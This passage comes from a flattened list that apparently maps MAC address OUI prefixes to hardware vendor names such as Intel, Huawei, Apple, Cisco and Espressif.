Inc. BCF88B zte corporation 68539D EM Microelectronic ECE6A2 Fiberhome Telecommunication Technologies Co.,LTD AC84C6 TP-LINK TECHNOLOGIES CO.,LTD. 1C0ED3 Sichuan Tianyi Comheart Telecom Co.,LTD C8BF4C Beijing Xiaomi Mobile Software Co., Ltd 7CDE78 New H3C Technologies Co., Ltd 385CFB Silicon Laboratories C43D1A Intel Corporate 04E8B9 Intel Corporate E02E0B Intel Corporate B8FBAF Xiamen IPRT Technology CO.,LTD 348518 Espressif Inc. E0F728 Amazon Technologies Inc. 242934 Google, Inc. 380A4F PRACHI ENTERPRISES 3CE064 Texas Instruments E0928F Texas Instruments CC037B Texas Instruments 581CF8 Intel Corporate AC198E Intel Corporate C85EA9 Intel Corporate 0CBEF1 Huawei Device Co., Ltd. AC936A Huawei Device Co., Ltd. 38A44B Huawei Device Co., Ltd. 801970 Samsung Electronics Co.,Ltd 3822F4 Huawei Device Co., Ltd. 549A11 IEEE Registration Authority CC29BD zte corporation C09F51 SERNET (SUZHOU) TECHNOLOGIES CORPORATION 8002F4 IEEE Registration Authority 149BF3 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD B850D8 Beijing Xiaomi Mobile Software Co., Ltd F4B3B1 Silicon Laboratories A0CDF3 Murata Manufacturing Co., Ltd. B48A0A Espressif Inc. C83A1B Toshiba TEC Corporation Inc AC5AF0 LG Electronics ECA62F HUAWEI TECHNOLOGIES CO.,LTD 10071D Fiberhome Telecommunication Technologies Co.,LTD 10B232 Qingdao Intelligent&Precise Electronics Co.,Ltd. 5C53C3 Ubee Interactive Co., Limited C8C13C RuggedTek Hangzhou Co., Ltd 30D587 Samsung Electronics Co.,Ltd 581DD8 Sagemcom Broadband SAS 8470D7 eero inc. 2CDC78 Descartes Systems (USA) LLC 14F592 Shenzhen SDG DONZHI Technology Co., Ltd 4C09FA FRONTIER SMART TECHNOLOGIES LTD C08D51 Amazon Technologies Inc. 44B4B2 Amazon Technologies Inc. 08E63B zte corporation 88C174 zte corporation 68A7B4 Honor Device Co., Ltd. 78034F Nokia 6C1524 IEEE Registration Authority 242CFE Zhejiang Tmall Technology Co., Ltd. A042D1 Huawei Device Co., Ltd. 58879F Huawei Device Co., Ltd. E8D87E Amazon Technologies Inc. 9C1FCA Hangzhou AlmightyDigit Technology Co., Ltd ACCCFC Amazon Technologies Inc. C89E61 Lyngsoe Systems LTd 48B4C3 Aruba, a Hewlett Packard Enterprise Company E8DC6C Cisco Systems, Inc 803C20 HUAWEI TECHNOLOGIES CO.,LTD A4DD58 HUAWEI TECHNOLOGIES CO.,LTD 0015A6 Digital Electronics Products Ltd. A8A237 Arcadyan Corporation F8AB82 Xiaomi Communications Co Ltd EC30B3 Xiaomi Communications Co Ltd A8C98A New H3C Technologies Co., Ltd E0276C Guangzhou Shiyuan Electronic Technology Company Limited DC8E95 Silicon Laboratories 90935A ARRIS Group, Inc. AC8FA9 Nokia Solutions and Networks GmbH & Co. KG B01F8C Aruba, a Hewlett Packard Enterprise Company 000AD0 Niigata Develoment Center, F.I.T. Co., Ltd. 28BE43 vivo Mobile Communication Co., Ltd. 2CFC8B GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 7CEF40 Nextorage Corporation C0E01C IoT Security Group, SL 2874F5 Nokia Solutions and Networks GmbH & Co. KG 44291E AltoBeam (China) Inc. 24EBED HUAWEI TECHNOLOGIES CO.,LTD AC51AB HUAWEI TECHNOLOGIES CO.,LTD 48CDD3 HUAWEI TECHNOLOGIES CO.,LTD B8211C Apple, Inc. B03F64 Apple, Inc. 9C57BC eero inc. 002604 WorldCast Systems F8AD24 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 902CFB CanTops Co,.Ltd. 1CAF4A Samsung Electronics Co.,Ltd C8120B Samsung Electronics Co.,Ltd 2C8217 Apple, Inc. 142D4D Apple, Inc. EC42CC Apple, Inc. A04466 Intellics 446D7F Amazon Technologies Inc. 1C61B4 TP-Link Corporation Limited 9CA2F4 TP-Link Corporation Limited 18BC57 ADVA Optical Networking Ltd. D8E2DF Microsoft Corporation 2406F2 Sichuan Tianyi Comheart Telecom Co.,LTD 7C6A60 China Mobile Group Device Co.,Ltd. B4695F TCT mobile ltd 24753A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 6C9308 IEEE Registration Authority 6C0F61 Hypervolt Ltd 388F30 Samsung Electronics Co.,Ltd C0C170 Shenzhen SuperElectron Technology Co.,Ltd. 504289 zte corporation CC6618 Adtran Inc 84C692 Texas Instruments 6CB2FD Texas Instruments 6818D9 Hill AFB - CAPRE Group 90F7B2 New H3C Technologies Co., Ltd 1C47F6 Zhidao Network Technology(Shenzhen) Co.,Ltd 000CD6 PARTNER TECH 8C1553 Beijing Memblaze Technology Co Ltd B0A4F0 HUAWEI TECHNOLOGIES CO.,LTD 04E31A Sagemcom Broadband SAS 302BDC Top-Unum Electronics Co., LTD C85895 Motorola Mobility LLC, a Lenovo Company E4DADF Taicang T&W Electronics 7C35F8 Zhejiang Tmall Technology Co., Ltd. 7426FF zte corporation C42728 zte corporation A8537D Mist Systems, Inc. 303422 eero inc. 8CC7C3 NETLINK ICT E8EBD3 Mellanox Technologies, Inc. 6C999D Amazon Technologies Inc. C0060C HUAWEI TECHNOLOGIES CO.,LTD 6CB158 TP-LINK TECHNOLOGIES CO.,LTD. E881AB Beijing Sankuai Online Technology Co.,Ltd B05C16 Fiberhome Telecommunication Technologies Co.,LTD 08E021 Honor Device Co., Ltd. D4BD4F Ruckus Wireless 5CC9C0 Renesas Electronics (Penang) Sdn. Bhd. E8D322 Cisco Systems, Inc C07982 TCL King Electrical Appliances(Huizhou)Co.,Ltd 7CC95E Dongguan Liesheng Electronic Co., Ltd. D0EDFF ZF CVCS 988FE0 IEEE Registration Authority F8A91F ZVISION Technologies Co., Ltd 2C3341 China Mobile IOT Company Limited AC567B Sunnovo International Limited 34D737 IBG Industriebeteiligungsgesellschaft mbH &b Co. KG F828C9 HUAWEI TECHNOLOGIES CO.,LTD FC1193 HUAWEI TECHNOLOGIES CO.,LTD B48C9D AzureWave Technology Inc. 50B3B4 Shenzhen Furuilian Electronic Co.,Ltd. 9CC12D GD Midea Air-Conditioning Equipment Co.,Ltd. A0B4BF InfiNet LLC 4CBAD7 LG Innotek 080076 PC LAN TECHNOLOGIES 7CCCFC Quectel Wireless Solutions Co.,Ltd. 34B883 Cisco Systems, Inc 94E686 Espressif Inc. 80657C Apple, Inc. DC8084 Apple, Inc. 38C804 Hui Zhou Gaoshengda Technology Co.,LTD E007C2 FUJIAN STAR-NET COMMUNICATION CO.,LTD A05394 Shenzhen zediel co., Ltd. 04EEE8 IEEE Registration Authority 9CB8B4 AMPAK Technology,Inc. F061C0 Aruba, a Hewlett Packard Enterprise Company 18D793 IEEE Registration Authority 2CFDB4 Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 102C8D GD Midea Air-Conditioning Equipment Co.,Ltd. 9850A3 SIGNALTEK JSC D8B673 Texas Instruments B4F267 Compal Broadband Networks, Inc. 84B4DB Silicon Laboratories 1C70C9 Jiangsu Aisida Electronic Co., Ltd 3CF7D1 OMRON Corporation DC3643 IEEE Registration Authority B0DD74 Heimgard Technologies AS C0FBC1 ITEL MOBILE LIMITED DCCCE6 Samsung Electronics Co.,Ltd F065AE Samsung Electronics Co.,Ltd 50874D GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD A41752 Hifocus Electronics India Private Limited 00620B Broadcom Limited 40FE95 New H3C Technologies Co., Ltd E85177 Qingdao Intelligent&Precise Electronics Co.,Ltd. 388A21 UAB "Teltonika Telematics" A05950 Intel Corporate 2CDD5F Shenzhen iComm Semiconductor CO.,LTD 5089D1 Huawei Device Co., Ltd. 000F32 Lootom Telcovideo Network (Wuxi) Co Ltd E06D18 PIONEERCORPORATION A45FB9 DreamBig Semiconductor, Inc. 345D9E Sagemcom Broadband SAS 18C23C Lumi United Technology Co., Ltd 0475F9 Taicang T&W Electronics C0BAE6 Application Solutions (Safety and Security) Ltd BCD074 Apple, Inc. C89BAD Honor Device Co., Ltd. CCA3BD ITEL MOBILE LIMITED 6C3A36 Glowforge Inc BCAF87 smartAC.com, Inc. D4354A ALAXALA Networks Corporation 40E99B SAMSUNG ELECTRO-MECHANICS(THAILAND) 90FFD6 Honor Device Co., Ltd. C0280B Honor Device Co., Ltd. 9CEA97 Honor Device Co., Ltd. 0C1EF7 Omni-ID B4D286 Telechips, Inc. C02B31 Phytium Technology Co.,Ltd. 58CF79 Espressif Inc. 786299 BITSTREAM sp. z o.o. CC5B31 Nintendo Co.,Ltd D42C46 BUFFALO.INC 1091A8 Espressif Inc. D46C6D ARRIS Group, Inc. A0E7AE ARRIS Group, Inc. 08F80D IEEE Registration Authority 4CC449 Icotera A/S BC455B Samsung Electronics Co.,Ltd B03CDC Intel Corporate 78047A Edge Networks LLC 8CF8C5 Intel Corporate 7CA62A Hewlett Packard Enterprise 1C4586 Nintendo Co.,Ltd 185B00 Nokia 6CC49F Aruba, a Hewlett Packard Enterprise Company 589B4A DWnet Technologies(Suzhou) Corporation C47D9F Samsung Electronics Co.,Ltd 384B24 SIEMENS AG F0AE66 Cosonic Intelligent Technologies Co., Ltd. 3CA916 Huawei Device Co., Ltd. 208097 Shenzhen OXO Technology limited 7C1689 Sagemcom Broadband SAS 5C83CD New platforms 507C6F Intel Corporate A06C65 Texas Instruments 448502 Shenzhen SuperElectron Technology Co.,Ltd. F4A454 IEEE Registration Authority 806A00 Cisco Systems, Inc 10E8A7 Wistron Neweb Corporation 8415D3 HUAWEI TECHNOLOGIES CO.,LTD D49400 HUAWEI TECHNOLOGIES CO.,LTD 70C6DD New H3C Technologies Co., Ltd 3C9EC7 SKY UK LIMITED EC50AA Aruba, a Hewlett Packard Enterprise Company A4EF15 AltoBeam (China) Inc. 58FCC6 TOZO INC C41C07 Samsung Electronics Co.,Ltd 4011C3 Samsung Electronics Co.,Ltd 10A51D Intel Corporate 088E90 Intel Corporate 282A87 ITEL MOBILE LIMITED A8B57C Roku, Inc 2426BA Shenzhen Toptel Technology Co., Ltd. 546CEB Intel Corporate 009337 Intel Corporate D468AA Apple, Inc. F8C3CC Apple, Inc. 305A99 Sichuan Tianyi Comheart Telecom Co.,LTD 604DE1 HUAWEI TECHNOLOGIES CO.,LTD 704E6B HUAWEI TECHNOLOGIES CO.,LTD 603D29 HUAWEI TECHNOLOGIES CO.,LTD 54C480 HUAWEI TECHNOLOGIES CO.,LTD D866EE BOXIN COMMUNICATION CO.,LTD. 042B58 Shenzhen Hanzsung Technology Co.,Ltd B812DA LVSWITCHES INC. A0D7F3 Samsung Electronics Co.,Ltd 58CE2A Intel Corporate F4573E Fiberhome Telecommunication Technologies Co.,LTD A861DF China Mobile Group Device Co.,Ltd. D8B053 Xiaomi Communications Co Ltd 6CF784 Xiaomi Communications Co Ltd 7890A2 zte corporation ACBCD9 Cisco Systems, Inc 98DD60 Apple, Inc. C04442 Apple, Inc. B8208E Panasonic Connect Co., Ltd. 847B57 Intel Corporate 508492 Intel Corporate 9880BB IEEE Registration Authority F06C73 Nokia 9C756E Ajax Systems DMCC E8F9D4 HUAWEI TECHNOLOGIES CO.,LTD B0C787 HUAWEI TECHNOLOGIES CO.,LTD 0C4F9B HUAWEI TECHNOLOGIES CO.,LTD 482FD7 HUAWEI TECHNOLOGIES CO.,LTD 24D81E MirWifi,Joint-Stock Company 90380C Espressif Inc. C4CA2B Arista Networks 607DDD Shenzhen Shichuangyi Electronics Co.,Ltd AC5E14 HUAWEI TECHNOLOGIES CO.,LTD 20DF73 HUAWEI TECHNOLOGIES CO.,LTD 48128F HUAWEI TECHNOLOGIES CO.,LTD BC2228 D-Link International B43D08 GX International BV 7089F5 Dongguan Lingjie IOT Co., LTD 9431CB vivo Mobile Communication Co., Ltd. 7C214A Intel Corporate 64CBE9 LG Innotek 40B0A1 VALCOM CO.,LTD. 103C59 zte corporation D48A3B HUNAN FN-LINK TECHNOLOGY LIMITED 4006D5 Cisco Systems, Inc B4205B GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 78444A Shenzhen Aiwinn information Technology Co., Ltd. D0F121 Xi'an LINKSCI Technology Co., Ltd 6CDDEF EPCOMM Inc. 10B7A8 CableFree Networks Limited 089BF1 eero inc. EC1C5D Siemens AG D03F27 Wyze Labs Inc 50297B China Mobile Group Device Co.,Ltd. 947F1D Shenzhen Fastrain Technology Co., Ltd. A4C69A Samsung Electronics Co.,Ltd 187A3B Aruba, a Hewlett Packard Enterprise Company 70B9BB Shenzhen Hankvision Technology CO.,LTD D0F520 KYOCERA Corporation 70B64F Guangzhou V-SOLUTION Electronic Technology Co., Ltd. B89470 Calix Inc. E4293D Shenzhen Sy-Fiber Optical Communication Technology.Co.,Ltd 9C5636 Huawei Device Co., Ltd. 40CA63 Seongji Industry Company 8CB87E Intel Corporate 701AB8 Intel Corporate 5CDF89 Ruckus Wireless B88C29 GD Midea Air-Conditioning Equipment Co.,Ltd. 5444A3 Samsung Electronics Co.,Ltd 089E84 HUAWEI TECHNOLOGIES CO.,LTD 1082D7 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 785EE8 IEEE Registration Authority 9C40CD Synclayer Inc. 98502E Apple, Inc. 580AD4 Apple, Inc. A477F3 Apple, Inc. CCBCE3 HUAWEI TECHNOLOGIES CO.,LTD 3003C8 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 8C4B14 Espressif Inc. 18E215 Nokia 088EDC Apple, Inc. A84A28 Apple, Inc. D8BE1F Apple, Inc. BC6AD1 Xiaomi Communications Co Ltd 0845D1 Cisco Systems, Inc 8427B6 China Mobile IOT Company Limited FC4265 Zhejiang Tmall Technology Co., Ltd. 187758 Audoo Limited (UK) 44D454 Sagemcom Broadband SAS 6887C6 Cisco Systems, Inc 80248F Cisco Systems, Inc C8C9A3 Espressif Inc. E43BC9 HISENSE VISUAL TECHNOLOGY CO.,LTD E89526 Luxshare Precision Industry CO., LTD. 807EB4 Shenzhen SuperElectron Technology Co.,Ltd. 2CB8ED SonicWall 500A52 Huiwan Technologies Co. Ltd D49390 CLEVO CO. BC062D Wacom Co.,Ltd. 3C93F4 HUAWEI TECHNOLOGIES CO.,LTD 6433B5 IEEE Registration Authority BCD7A5 Aruba, a Hewlett Packard Enterprise Company 4C50F1 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD B4E454 Amazon Technologies Inc. 0C43F9 Amazon Technologies Inc. D494FB Continental Automotive Systems Inc. D88083 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. 504B9E Huawei Device Co., Ltd. 047AAE Huawei Device Co., Ltd. 54A9D4 Minibar Systems 000062 BULL HN INFORMATION SYSTEMS 104121 TELLESCOM INDUSTRIA E COMERCIO EM TELECOMUNICACAO 50E7A0 Renesas Electronics (Penang) Sdn. Bhd. 90E868 AzureWave Technology Inc. 409CA6 Curvalux 48F3F3 Baidu Online Network Technology (Beijing) Co., Ltd CC896C GN Hearing A/S 8C1ED9 Beijing Unigroup Tsingteng Microsystem Co., LTD. 50411C AMPAK Technology,Inc. 34B472 Espressif Inc. F80C58 Taicang T&W Electronics 3861A5 Grabango Co 78D3ED NORMA 44A92C IEEE Registration Authority 84AC16 Apple, Inc. 2CBC87 Apple, Inc. F42679 Intel Corporate B03795 LG Electronics A4FF95 Nokia D47350 DBG Commnunications Technology Co., Ltd. 70DA17 Austrian Audio GmbH 3C7AF0 ITEL MOBILE LIMITED 081C6E Xiaomi Communications Co Ltd 68F0D0 SkyBell Technologies Inc. FCA89B Texas Instruments 98F07B Texas Instruments 5078B0 Huawei Device Co., Ltd. E4072B Huawei Device Co., Ltd. 2446E4 HUAWEI TECHNOLOGIES CO.,LTD 38453B Ruckus Wireless 7806C9 Huawei Device Co., Ltd. E8A6CA Huawei Device Co., Ltd. CCFA66 Huawei Device Co., Ltd. FC58DF Interphone Service 981082 Nsolution Co., Ltd. 38A659 Sagemcom Broadband SAS 34243E zte corporation 98ED7E eero inc. 34FE9E Fujitsu Limited 68966A OHSUNG 902E16 LCFC(HeFei) Electronics Technology co., ltd F44637 Intel Corporate 0C718C TCT mobile ltd 24085D Continental Aftermarket & Services GmbH 508140 HP Inc. 606134 Genesis Technical Systems Corp A848FA Espressif Inc. 781305 IEEE Registration Authority 6450D6 Liquidtool Systems 505D7A zte corporation E4DC5F Cofractal, Inc. 4CAB4F Apple, Inc. 9C583C Apple, Inc. C41234 Apple, Inc. 3CA6F6 Apple, Inc. 681BEF HUAWEI TECHNOLOGIES CO.,LTD 000901 Shenzhen Shixuntong Information & Technoligy Co F463E7 Nanjing Maxon O.E. Tech. Co., LTD 88AEDD EliteGroup Computer Systems Co., LTD F88EA1 Edgecore Networks Corporation 2C4881 vivo Mobile Communication Co., Ltd. 6026EF Aruba, a Hewlett Packard Enterprise Company E40CFD GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 58D697 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 5437BB Taicang T&W Electronics A0E70B Intel Corporate 04EEEE Laplace System Co., Ltd. C03C04 Sagemcom Broadband SAS A4D73C Seiko Epson Corporation 000808 PPT Vision, Inc. 6C108B WeLink Communications 7C8530 Nokia 482218 Shenzhen Yipingfang Network Technology Co., Ltd. 30A176 Fiberhome Telecommunication Technologies Co.,LTD 4C7167 PoLabs d.o.o. 58FD5D Hangzhou Xinyun technology Co., Ltd. A45590 Xiaomi Communications Co Ltd 08010F Sichuan Tianyi Comheart Telecom Co.,LTD 60F8F2 Synaptec AC74B1 Intel Corporate F46077 Texas Instruments 1C3CD4 HUAWEI TECHNOLOGIES CO.,LTD F4E451 HUAWEI TECHNOLOGIES CO.,LTD 48E7DA AzureWave Technology Inc. 047153 SERNET (SUZHOU) TECHNOLOGIES CORPORATION 40C48C N-iTUS CO.,LTD. 24A799 Huawei Device Co., Ltd. 7C3E74 Huawei Device Co., Ltd. 148919 2bps F8BAE6 Nokia BCECA0 COMPAL INFORMATION (KUNSHAN) CO., LTD. 2C0823 Sercomm France Sarl 308E7A Shenzhen iComm Semiconductor CO.,LTD B8A377 Cisco Systems, Inc E44E2D Cisco Systems, Inc 984265 Sagemcom Broadband SAS C42360 Intel Corporate 103D1C Intel Corporate 3887D5 Intel Corporate 1CD107 Realme Chongqing Mobile Telecommunications Corp.,Ltd. C0CC42 Sichuan Tianyi Comheart Telecom Co.,LTD DC215C Intel Corporate 806559 EM Microelectronic 78D9E9 MOMENTUM IOT 185207 Sichuan Tianyi Comheart Telecom Co.,LTD E0C63C Sichuan Tianyi Comheart Telecom Co.,LTD C87B23 Bose Corporation A8934A CHONGQING FUGUI ELECTRONICS CO.,LTD. D047C1 Elma Electronic AG 9C1C37 AltoBeam (China) Inc. 34AB95 Espressif Inc. C491CF Luxul D89AC1 Nokia F0B11D Nokia A4056E Tiinlab Corporation 00047D Motorola Solutions Inc. A4D795 Wingtech Mobile Communications Co.,Ltd 84AB26 Tiinlab Corporation 58356B TECNO MOBILE LIMITED 8C19B5 Arcadyan Corporation 7CD9F4 UAB "Teltonika Telematics" F89753 Huawei Device Co., Ltd. 5894AE Huawei Device Co., Ltd. B03ACE Huawei Device Co., Ltd. F84CDA HUAWEI TECHNOLOGIES CO.,LTD BCFF4D Espressif Inc. FC4EA4 Apple, Inc. F4BEEC Apple, Inc. 54E61B Apple, Inc. FC13F0 Bouffalo Lab (Nanjing) Co., Ltd. FC9C98 Arlo Technology 1C6EE6 NHNETWORKS 08F606 zte corporation 1CD1E0 Cisco Systems, Inc E8FD35 Huawei Device Co., Ltd. ECC5D2 Huawei Device Co., Ltd. 24456B Huawei Device Co., Ltd. 483871 Huawei Device Co., Ltd. 44BDDE BHTC GmbH B4608C Fiberhome Telecommunication Technologies Co.,LTD 0004AD Malibu Networks CC68B6 TP-Link Corporation Limited 14DD9C vivo Mobile Communication Co., Ltd. 64644A Beijing Xiaomi Mobile Software Co., Ltd 8C2A8E DongGuan Ramaxel Memory Technology 80071B VSOLUTION TELECOMMUNICATION TECHNOLOGY CO.,LTD. B814DB OHSUNG C45BBE Espressif Inc. 002618 ASUSTek COMPUTER INC. 4044FD Realme Chongqing Mobile Telecommunications Corp.,Ltd. 20896F Fiberhome Telecommunication Technologies Co.,LTD F4FBB8 HUAWEI TECHNOLOGIES CO.,LTD A070B7 HUAWEI TECHNOLOGIES CO.,LTD 78B554 Huawei Device Co., Ltd. 689E6A Huawei Device Co., Ltd. 282B96 Huawei Device Co., Ltd. E89E0C MAX8USA DISTRIBUTORS INC. 64808B VG Controls, Inc. CC3331 Texas Instruments A439B6 SHENZHEN PEIZHE MICROELECTRONICS CO .LTD 646EE0 Intel Corporate 0456E5 Intel Corporate 884604 Xiaomi Communications Co Ltd 841EA3 Sagemcom Broadband SAS 84267A GUANGDONG TAIDE ZHILIAN TECHNOLOGY CO.,LTD 6C4760 Sunitec Enterprise Co.,Ltd 183219 EM Microelectronic 84D608 Wingtech Mobile Communications Co., Ltd. 346893 Tecnovideo Srl 28D3EA Huawei Device Co., Ltd. 9023B4 New H3C Technologies Co., Ltd 882A5E New H3C Technologies Co., Ltd 246968 TP-LINK TECHNOLOGIES CO.,LTD. FCA9DC Renesas Electronics (Penang) Sdn. Bhd. FC584A xiamenshi c-chip technology co., ltd F40223 PAX Computer Technology(Shenzhen) Ltd. 6479F0 Intel Corporate 081086 NEC Platforms, Ltd. A8F266 Huawei Device Co., Ltd. CC9C3E Cisco Meraki D8EC5E Belkin International Inc. 4829E4 AO 78653B Shaoxing Ourten Electronics Co., Ltd. E0E656 Nethesis srl 3C7AAA China Dragon Technology Limited 84FD27 Silicon Laboratories 0020C1 SAXA, Inc. 7C5079 Intel Corporate 8038FB Intel Corporate A45E5A ACTIVIO Inc. 749AC0 Cachengo, Inc. 34587C MIRAE INFORMATION TECHNOLOGY CO., LTD. 08B4B1 Google, Inc. 5C56A4 Wanan Hongsheng Electronic Co.Ltd 3C9BC6 Huawei Device Co., Ltd. 0036BE Northwest Towers 642656 Shenzhen Fanweitai Technology Service Co.,Ltd AC8247 Intel Corporate F0258E HUAWEI TECHNOLOGIES CO.,LTD 9C746F HUAWEI TECHNOLOGIES CO.,LTD E06C4E Shenzhen TINNO Mobile Technology Corp. 50558D China Mobile IOT Company Limited 281B04 Zalliant LLC 7C5259 Sichuan Jiuzhou Electronic Technology Co., Ltd. 4CF202 Xiaomi Communications Co Ltd A877E5 SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 10A4DA HUAWEI TECHNOLOGIES CO.,LTD 382028 HUAWEI TECHNOLOGIES CO.,LTD E47727 HUAWEI TECHNOLOGIES CO.,LTD 540910 Apple, Inc. 9CFC28 Apple, Inc. B485E1 Apple, Inc. 0C19F8 Apple, Inc. 501FC6 Apple, Inc. CC69FA Apple, Inc. 10CEE9 Apple, Inc. 105107 Intel Corporate AC74C4 Maytronics Ltd. F4B301 Intel Corporate E8D2FF Sagemcom Broadband SAS 0C96CD MERCURY CORPORATION A03B01 Kyung In Electronics 18188B FCNT LMITED 145E69 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 34F716 TP-LINK TECHNOLOGIES CO.,LTD. E8A0CD Nintendo Co.,Ltd 9C823F Huawei Device Co., Ltd. 54F607 Huawei Device Co., Ltd. 5CDE34 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. A0A3F0 D-Link International 102FA3 Shenzhen Uvision-tech Technology Co.Ltd 04495D Huawei Device Co., Ltd. F0FEE7 Huawei Device Co., Ltd. 54211D Huawei Device Co., Ltd. 143FA6 Sony Home Entertainment&Sound Products Inc 44D453 Sagemcom Broadband SAS DCCD74 Japan E.M.Solutions Co., Ltd. C4E287 HUAWEI TECHNOLOGIES CO.,LTD 484C29 HUAWEI TECHNOLOGIES CO.,LTD C4D438 HUAWEI TECHNOLOGIES CO.,LTD 846569 New H3C Technologies Co., Ltd 18CE94 Samsung Electronics Co.,Ltd 783716 Samsung Electronics Co.,Ltd 64E003 Hui Zhou Gaoshengda Technology Co.,LTD DCA120 Nokia 50523B Nokia 045FB9 Cisco Systems, Inc 58B0FE Team EPS GmbH 90C792 ARRIS Group, Inc. 5C6F69 Broadcom Limited D012CB AVM Audiovisuelles Marketing und Computersysteme GmbH 78CF2F HUAWEI TECHNOLOGIES CO.,LTD 20FF36 IFLYTEK CO.,LTD. 2406AA GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 24649F Huawei Device Co., Ltd. 0C1773 Huawei Device Co., Ltd. E81E92 Huawei Device Co., Ltd. 888E68 Huawei Device Co., Ltd. 807484 ALL Winner (Hong Kong) Limited 8CAE49 IEEE Registration Authority 748B29 Micobiomed E8F408 Intel Corporate 88238C Fiberhome Telecommunication Technologies Co.,LTD A83B5C HUAWEI TECHNOLOGIES CO.,LTD A8CC6F HMD Global Oy 843095 Hon Hai Precision IND.CO.,LTD 008A55 Huawei Device Co., Ltd. 64A28A Huawei Device Co., Ltd. AC471B Huawei Device Co., Ltd. 003192 TP-Link Corporation Limited 0865F0 JM Zengge Co., Ltd A4CCB9 Realme Chongqing Mobile Telecommunications Corp.,Ltd. 6CB881 zte corporation 989AB9 zte corporation 607EA4 Shanghai Imilab Technology Co.Ltd 085531 Routerboard.com BC5BD5 ARRIS Group, Inc. 14AB02 HUAWEI TECHNOLOGIES CO.,LTD 3C6105 Espressif Inc. B04530 SKY UK LIMITED 6CA0B4 SKY UK LIMITED EC0DE4 Amazon Technologies Inc. 4C20B8 Apple, Inc. 1488E6 Apple, Inc. B456E3 Apple, Inc. 8C55BB Songwoo Information & Technology Co., Ltd 7C8FDE DWnet Technologies(Suzhou) Corporation 241145 Xiaomi Communications Co Ltd 7895EB ITEL MOBILE LIMITED B0BBE5 Sagemcom Broadband SAS 1C9F4E COOSEA GROUP (HK) COMPANY LIMITED A468BC Oakley Inc. B0C53C Cisco Systems, Inc ECCE13 Cisco Systems, Inc 8CFDDE Sagemcom Broadband SAS 48D890 FN-LINK TECHNOLOGY LIMITED 781F11 RAB Lighting 0838E6 Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. E8C2DD Infinix mobility limited C41C9C JiQiDao 847127 Silicon Laboratories 98F181 New H3C Technologies Co., Ltd 107100 Huawei Device Co., Ltd. F8B95A LG Innotek 00042B IT Access Co., Ltd. D44F67 HUAWEI TECHNOLOGIES CO.,LTD B4FF98 HUAWEI TECHNOLOGIES CO.,LTD C418E9 Samsung Electronics Co.,Ltd 1CE57F Samsung Electronics Co.,Ltd 5895D8 IEEE Registration Authority F80DAC HP Inc. 8850F6 Shenzhen Jingxun Software Telecommunication Technology Co.,Ltd 0405DD Shenzhen Cultraview Digital Technology Co., Ltd 3897A4 ELECOM CO.,LTD. E433AE GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 387A3C Fiberhome Telecommunication Technologies Co.,LTD 8CCE4E Espressif Inc. 849DC2 Shanghai MXCHIP Information Technology Co., Ltd. 184516 Texas Instruments D02EAB Texas Instruments 40B5C1 Cisco Systems, Inc E44791 Iris ID Systems, Inc. F013C1 Hannto Technology Co., Ltd F0F7E7 HUAWEI TECHNOLOGIES CO.,LTD E884A5 Intel Corporate 8454DF Huawei Device Co., Ltd. 40A9CF Amazon Technologies Inc. 90808F Huawei Device Co., Ltd. 00C035 QUINTAR COMPANY 101965 New H3C Technologies Co., Ltd 94FF61 China Mobile Group Device Co.,Ltd. D8F883 Intel Corporate B436D1 Renesas Electronics (Penang) Sdn. Bhd. 006151 HUAWEI TECHNOLOGIES CO.,LTD BC76C5 HUAWEI TECHNOLOGIES CO.,LTD AC1D06 Apple, Inc. 44A8FC Apple, Inc. F81093 Apple, Inc. 1C501E Sunplus Technology Co., Ltd. 409505 ACOINFO TECHNOLOGY CO.,LTD 5CD89E Huawei Device Co., Ltd. B82D28 AMPAK Technology,Inc. DCE994 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD. DC774C Cisco Systems, Inc 204441 Remote Solution FC4482 Intel Corporate A085FC Microsoft Corporation 14A9D0 F5 Networks, Inc. 000A49 F5 Networks, Inc. 0094A1 F5 Networks, Inc. 80F1F1 Tech4home, Lda B85F98 Amazon Technologies Inc. A4134E Luxul FC66CF Apple, Inc. E81B69 Sercomm Corporation. 6852D6 UGame Technology Co.,Ltd FC1999 Xiaomi Communications Co Ltd E89F80 Belkin International Inc. B4C26A Garmin International B88035 Shenzhen Qihu Intelligent Technology Company Limited 9012A1 We Corporation Inc. 64B623 Schrack Seconet Care Communication GmbH 000EFF Megasolution,Inc. 702C09 Nintendo Co.,Ltd E4D373 HUAWEI TECHNOLOGIES CO.,LTD C0BC9A HUAWEI TECHNOLOGIES CO.,LTD F4E578 LLC Proizvodstvennaya Kompania "TransService" CC874A Nokia A45129 XAG 5C0272 Silicon Laboratories 000430 Netgem 0446CF Beijing Venustech Cybervision Co.,Ltd. B8DD71 zte corporation 6CE5F7 New H3C Technologies Co., Ltd 78F8B8 Rako Controls Ltd 0854BB SHENZHEN CHUANGWEI-RGB ELECTRONICS CO.,LTD 60EB5A Asterfusion Data Technologies Co.,Ltd 3CB15B Avaya Inc 5865E6 infomark 08FBEA AMPAK Technology,Inc. 3C9C0F Intel Corporate 1C5D80 Mitubishi Hitachi Power Systems Industries Co., Ltd. 801605 Vodafone Italia S.p.A. 000895 DIRC Technologie GmbH & Co.KG 00269E Quanta Computer Inc. C45444 Quanta Computer Inc. 5C443E Skullcandy F88200 CaptionCall 0050F1 Maxlinear, Inc A802DB zte corporation B42330 Itron Inc 001B24 Quanta Computer Inc. 00C09F Quanta 